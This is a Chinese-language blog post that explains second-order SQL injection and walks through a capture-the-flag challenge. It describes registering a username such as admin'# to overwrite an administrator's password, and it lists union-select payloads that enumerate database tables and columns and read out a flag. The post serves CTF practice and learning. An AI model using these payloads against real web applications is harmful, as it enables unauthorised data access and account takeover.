什么是二次注入

二次注入可以理解为，攻击者构造的恶意数据存储在数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。防御者即使对用户输入的恶意数据进行转义，当数据插入到数据库中时被处理的数据又被还原，Web程序调用存储在数据库中的恶意数据并执行SQL查询时，就发生了SQL二次注入。

可以理解为就是第一次注入并不是为了直接注入，第一次注入不会影响什么，第二次注入才会导致注入的产生，达到自己的目的

题型

二次注入的特点就是会给你一个登录页面以及注册页面，有时候注册页面还要需要你自己去找，但这个注册页面一般为url+register.php，然后在注册时去猜测它的sql注册语句如你注册了一个admin'#，密码自己设置，就可能会把admin后面的sql语句给注释掉，那么你的用户名就是admin，密码就是你设置那个，也就是说你把管理员的密码重新设置了，但不一定是单引号闭合；

有的题是注册和修改密码配合在一起了，如https://www.cnblogs.com/jackie-lee/p/16124022.html

 这位大佬就是用的这个实验做的相关的题型

例题

多说无益，用题去见真章

buuctf October 2019 Twice SQL Injection 1

题目名字就已经告诉我们，这就是一个二次注入的题目

打开网页有两个页面，一个是登录页面，一个注册页面，去注册页面注册一个账号，然后登录上去先看看情况，看看注入点在哪里，注册之后登录上面之后发现一个框，可以输入东西并在上面显示，试一下sql注入相关的语句，发现它会对关键符号进行转义；

 先不管这里了，去别的地方测试测试，那么下一个地方就是用注册和登录了，想用上面的知识点注册一个管理员页面，但不行，我感觉原因就是这个知识点用admin'#这个账号注册的知识点，需要和修改密码哪里配合使用，但这里只有注册和登录页面，所以我想着直接用sql语句看看会不会执行

用户名：1" union select database()#

密码：1

注册发现并没有太大的变化

试一试单引号

用户名：1' union select database()#

账号：1

发现回显出了数据库，感觉有戏

继续

1‘ union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #

1’ union select group_concat(column_name) from information_schema.columns where table_name='flag'#

1‘ union select flag from flag #

得到flag

随后如果在找到相关二次注入的题目，本篇博客会继续更新；